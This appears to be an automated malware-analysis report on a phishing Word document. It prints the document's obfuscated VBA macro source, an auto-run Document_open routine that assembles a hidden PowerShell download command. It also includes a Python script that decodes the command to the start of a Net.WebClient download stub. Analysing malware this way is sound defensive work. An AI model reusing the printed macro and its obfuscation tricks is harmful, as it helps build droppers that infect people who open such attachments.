Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros. A Document_open auto-exec procedure builds a string from dozens of concatenated fragments and passes it to Application.Run("uUtAGYZdWAiWiQ", ...), a procedure that lies outside the extracted preview; the OLE_VBA_SHELL heuristic shows that a Shell() call exists in the project, which is presumably where the assembled command is executed. The obfuscation relies on On Error Resume Next, junk arithmetic on undeclared variables, and concatenation with undeclared variables (Empty Variants, which contribute nothing), so that only the quoted literals survive. The fragments visible in the preview assemble to `POWerSheLL  "-JOin ('36B80Z122Z106r61{110Z101d119h45!...`: a PowerShell command whose payload is a run of decimal ASCII codes separated by filler characters, to be reassembled with -Join at run time. Reading the visible digit runs as ASCII yields `$Pzj=new-object Net.WebClien...`, the start of a Net.WebClient download stub. This is consistent with a macro-based downloader delivered as a spearphishing attachment.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6609044-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6609044-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace declared in the document's own markup and is present in ordinary Office files; it is not a download location or a C2 indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34696 bytes | f0bfe68020c8628a0235339c7f3bce720f19c38ea1778299976ee244cc6ef64f |
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ZFAjKccCNMYa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
TJYnh = RwZXF * PlBTvc - (fkaRn - 98475)
AhrQUR = QqFDhu * WlUEiS - (kPXzjA - 35731)
GLass = oRkwhk * YFjzG - (oNrKO - 91660)
RfiVjXPUM = Application.Run("uUtAGYZdWAiWiQ", "" + RoQhYfluJG + UVfLMNViWf + PBMGzOAtpK + GzvDoGH + sHRadGYjDB + imNWAXhs + RuBRrHSj + bjrduYIj + DlwXEiYWkJt + QdkhF + GRJFn + TnZGqoopuw + RWhXTHj + sjOqJG + unwmDtaMFtCZ + kXouFoHliPVwKP)
YZOoPi = dmhlKo * HoTNj - (IvOCkX - 62774)
HjLLt = POPbnZ * MsqOGY - (kauIO - 72033)
wmKDX = wvhNzt * GElWPH - (aBAldJ - 16359)
End Sub
Attribute VB_Name = "DzHAiqpNzJPmO"
Function PBMGzOAtpK()
On Error Resume Next
iaOtao = 25249 - Aiizk + 16741 + WQhZY * WHkfms - vVNla + vvQXWr + 11277 * vzaSzr + 81732 - mdSXwM / dNovG * (47999 / UwWKNG)
tHttzBKHK = "" + hShaKKNo + HijSDbicn + "POW" + vzVPcdvnikht + EQlJSAzvpQzk + "er" + iidSjcmSL + hRBVjaoQizLw + "She" + IiAKESszcF + PKrwlFb + "LL " + jwZIqITvUXhK + tlIGsphpwVa + " " + ZjNGVsjZkbB + YDHiSvSj + Chr(34) + "-JO" + cwilDtCDi + uLGQLSNAJJG + "in (" + RdhODisubWkH + fjhYThjd + "'3" + RHdEjoD + AUZMoAD + "6B80" + TpVJYLiUblnL + mfwvAnLmTOBmm + "Z122"
PBMGzOAtpK = "" + sXPszJCfIi + OMRiuzfnjr + tHttzBKHK
ITazAS = 19329 - ivMac - BboQo - 46528 * 67373 + zXfpFN / 13841 * bqJATO * 97294 * wajAv * wBUzC + ObjKr
AXhVG = 13833 - ZcAjOY - DijAo - 24866 * 65796 + wZCjH / 73595 * SnBSL * 85152 * bhYAwt * NdCJbw + EjCrV
End Function
Function GzvDoGH()
On Error Resume Next
kDAUL = 34047 - bsjFi - BooFB - 86638 * 53634 + waHssc / 2442 * TUrwIC * 82056 * SOTbn * uWZRU + XWawN
TKMwG = 69098 - WQbjn - mUOoiA - 84875 * 52230 + VHLCjz / 20113 * JHuvhl * 26483 * uLnZkt * ObcHS + IMbbp
zOiBUHooVD = "" + tbToQjZMNlr + dmnZAFafkTaIjX + "Z1" + uiwONRquiLGwiI + WXujnXNGNz + "06r" + sjjIcSTC + jLvsvozdzbjA + "61{1" + dNGXVpBP + BzczUPpkinni + "10Z1" + bYHjAhcrvZfOMv + hUDNqzM + "01"
sDPwHR = 70389 - rwiZoF - hPCvTA - 79943 * 26906 + TXkBW / 44099 * EoWFAV * 83396 * izuYHw * rpLBnd + YzCpOi
ilvWz = 42882 - ZLvwiR - aGJCC - 35255 * 10760 + uDYFS / 59178 * EiMFaS * 92079 * VzDlpA * kXQEdH + uKiDfr
iFUJak = (AwMYI + TGQGD) / (fvpVjJ + PYCKG - 23897 + BQoEw * (46803 / 94411 / 49371 * NpPUjF))
OYPPICfIqqz = "" + LtEltklARUtz + LzLCSMH + "d119"
NsKYMZ = (BvQUA + IqAPO) / (jGzBn + RUJPa - 20340 + bYLhR * (15242 / 85056 / 49068 * PIBps))
FGbfTp = (KhQbv + EPXET) / (Gcjqak + UXDZZ - 52631 + EzfRER * (20564 / 87146 / 20509 * hLJsv))
FjDlUauvtKr = "" + LuiqMXOqWLuFG + FvZizJiHWf + "h45!" + qAzUNQSDjjiOB + uwzUJdnvuSVGh + "11" + HKtjXpZqjoni + NLhASoKYLJ + "1h9" + FDCsKkb + YUUYAUFQfV + "8i10" + VhGnFOnbizjTVk + odDGuBoqMcSTF + "6s" + nSDjWvEFWnS + lBDQwRcBSo + "101h" + sQadwUWaTv + AAtjYjTbL + "99" + LYBVoji + wOiidcZTwOF + "r116" + lQwXsdm + JcKPEuwiupa + "s3" + lVOFvHzfwK + nlWQnAiJ + "2i78" + BUOXiUN + PiRicJmhi + ">10" + MRvERJcRGorNwf + rYciSbtAjVGtHB + "1i11"
nXtkY = (GVsvO + XRSzIO) / (JBqfkX + YvCiKF - 42587 + ZbljVh * (33325 / 14488 / 74033 * NScOC))
SpSECwoQ = "" + FICwsJMdlLSJl + jsrNZtN + "6{4" + EIXFRJsvzSzNlc + XrwGpdlDMtW + "6{8" + MzsQHsjlHMcSXL + swPIkBBR + "7d10" + bXTsYmj + SGwdkzqPfTnR + "1Z98" + sUuHDJKza + RLROnpl + "d67" + ADvUfIulWzw + FbXifdsb + "d10" + SbTnYBsiBwr + ZZbuOYacfOGGq + "8!10"
GzvDoGH = "" + KIdwiXdt + VkiTwrSnmw + zOiBUHooVD + idDuDmM + iKjUtSsnRvjP + OYPPICfIqqz + nwJiXoSErEGaA + UqjAnnZuzDYa + FjDlUauvtKr + CXoIkPwtEo + dSiNTSzDw + SpSECwoQ
PmFNBJ = (wNSjoj + SQfla) / (scYJGP + kGdwXz - 46403 + ViBwj * (49222 / 80759 / 19516 * udzvBC))
End Function
Function sHRadGYjDB()
On Error Resume Next
UHnNw = (lYusk + LrItw) / (ioqMCR + PdSpjD - 22983 + BdQlHh * (89759 / 20909 / 22471 * zZailp))
RhVESiE = "" + mdfHFVkjd + KoYqJOsHpEjd + "5B10" + EsChrcnfnZBW + QWBQrdVI + "1d11" + YXzvPMDzAbAc + mqvfBzontjqSCS + "0s"
... (truncated)
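To check what the macro actually builds, the following added example (my code, not part of the report or the analyzer) re-evaluates the string-building lines copied from the preview above with VBA's semantics for undeclared names (an Empty Variant contributes nothing to a `+` concatenation), then decodes the digit runs of the assembled command. Two points are assumptions: the PowerShell side of the command is truncated away, so reading each digit run as an ASCII code is inferred from the `-JOin ('` prefix rather than taken from the sample; and the preview ends before sHRadGYjDB's return assignment, so its first visible fragment stands in for its value.

```python
import re

# Constructed input: the string-building lines of the three macro functions, copied
# from the preview above (junk arithmetic lines dropped; the preview is cut off inside
# sHRadGYjDB, so only its first fragment is available).
VBA_PREVIEW = r'''
Function PBMGzOAtpK()
tHttzBKHK = "" + hShaKKNo + HijSDbicn + "POW" + vzVPcdvnikht + EQlJSAzvpQzk + "er" + iidSjcmSL + hRBVjaoQizLw + "She" + IiAKESszcF + PKrwlFb + "LL " + jwZIqITvUXhK + tlIGsphpwVa + " " + ZjNGVsjZkbB + YDHiSvSj + Chr(34) + "-JO" + cwilDtCDi + uLGQLSNAJJG + "in (" + RdhODisubWkH + fjhYThjd + "'3" + RHdEjoD + AUZMoAD + "6B80" + TpVJYLiUblnL + mfwvAnLmTOBmm + "Z122"
PBMGzOAtpK = "" + sXPszJCfIi + OMRiuzfnjr + tHttzBKHK
End Function
Function GzvDoGH()
zOiBUHooVD = "" + tbToQjZMNlr + dmnZAFafkTaIjX + "Z1" + uiwONRquiLGwiI + WXujnXNGNz + "06r" + sjjIcSTC + jLvsvozdzbjA + "61{1" + dNGXVpBP + BzczUPpkinni + "10Z1" + bYHjAhcrvZfOMv + hUDNqzM + "01"
OYPPICfIqqz = "" + LtEltklARUtz + LzLCSMH + "d119"
FjDlUauvtKr = "" + LuiqMXOqWLuFG + FvZizJiHWf + "h45!" + qAzUNQSDjjiOB + uwzUJdnvuSVGh + "11" + HKtjXpZqjoni + NLhASoKYLJ + "1h9" + FDCsKkb + YUUYAUFQfV + "8i10" + VhGnFOnbizjTVk + odDGuBoqMcSTF + "6s" + nSDjWvEFWnS + lBDQwRcBSo + "101h" + sQadwUWaTv + AAtjYjTbL + "99" + LYBVoji + wOiidcZTwOF + "r116" + lQwXsdm + JcKPEuwiupa + "s3" + lVOFvHzfwK + nlWQnAiJ + "2i78" + BUOXiUN + PiRicJmhi + ">10" + MRvERJcRGorNwf + rYciSbtAjVGtHB + "1i11"
SpSECwoQ = "" + FICwsJMdlLSJl + jsrNZtN + "6{4" + EIXFRJsvzSzNlc + XrwGpdlDMtW + "6{8" + MzsQHsjlHMcSXL + swPIkBBR + "7d10" + bXTsYmj + SGwdkzqPfTnR + "1Z98" + sUuHDJKza + RLROnpl + "d67" + ADvUfIulWzw + FbXifdsb + "d10" + SbTnYBsiBwr + ZZbuOYacfOGGq + "8!10"
GzvDoGH = "" + KIdwiXdt + VkiTwrSnmw + zOiBUHooVD + idDuDmM + iKjUtSsnRvjP + OYPPICfIqqz + nwJiXoSErEGaA + UqjAnnZuzDYa + FjDlUauvtKr + CXoIkPwtEo + dSiNTSzDw + SpSECwoQ
End Function
Function sHRadGYjDB()
RhVESiE = "" + mdfHFVkjd + KoYqJOsHpEjd + "5B10" + EsChrcnfnZBW + QWBQrdVI + "1d11" + YXzvPMDzAbAc + mqvfBzontjqSCS + "0s"
End Function
'''

# A '+' operand is a string literal, a Chr(n) call, or a bare name.
TOKEN = re.compile(r'"([^"]*)"|Chr\((\d+)\)|([A-Za-z_]\w*)')
FUNC = re.compile(r'^Function (\w+)\(\)\n(.*?)^End Function', re.S | re.M)


def eval_concat(expr, env):
    """Evaluate a VBA '+' concatenation. Literals and Chr() contribute text; a name
    that was never assigned is an Empty Variant and contributes nothing, which is
    exactly what the obfuscator relies on to bury the literals among junk names."""
    out = []
    for lit, code, name in TOKEN.findall(expr):
        if code:
            out.append(chr(int(code)))
        elif name:
            out.append(env.get(name, ""))
        else:
            out.append(lit)
    return "".join(out)


def reconstruct(vba_source):
    """Return {function name: string it builds}. Lines with no literal or Chr() are
    the junk arithmetic and have no string effect, so they are skipped. Where the
    preview is truncated before the 'FuncName = ...' return assignment, fall back
    to the last fragment built (assumption, needed only for sHRadGYjDB)."""
    results = {}
    for fname, body in FUNC.findall(vba_source):
        env, last = {}, ""
        for line in body.splitlines():
            if " = " not in line or ('"' not in line and "Chr(" not in line):
                continue
            name, expr = line.split(" = ", 1)
            env[name.strip()] = last = eval_concat(expr, env)
        results[fname] = env.get(fname, last)
    return results


def assemble_command(vba_source):
    """Document_open concatenates ... + PBMGzOAtpK + GzvDoGH + sHRadGYjDB + ... before
    Application.Run; the surrounding names are not defined in the preview (Empty)."""
    parts = reconstruct(vba_source)
    return parts["PBMGzOAtpK"] + parts["GzvDoGH"] + parts["sHRadGYjDB"]


def decode_payload(command):
    """ASSUMPTION: the PowerShell stub (truncated away) splits the quoted blob on its
    non-digit filler and -Joins the numbers as [char] codes, as "-JOin ('" suggests."""
    blob = command.split("('", 1)[1]
    return "".join(chr(int(n)) for n in re.findall(r"\d+", blob))


if __name__ == "__main__":
    cmd = assemble_command(VBA_PREVIEW)
    print(cmd)                 # POWerSheLL  "-JOin ('36B80Z122Z106r61{110Z101d119h45!...
    print(decode_payload(cmd)) # $Pzj=new-object Net.WebClien
```

The decoded prefix `$Pzj=new-object Net.WebClien` corroborates the downloader verdict without running anything: the filler characters (Z, r, {, d, h, !, i, s, >, B) vary per fragment, so a decoder should split on any non-digit rather than on one delimiter. The same evaluator works on the rest of macros.bas once the full file is available; only the `-JOin` decoding step depends on the assumption above.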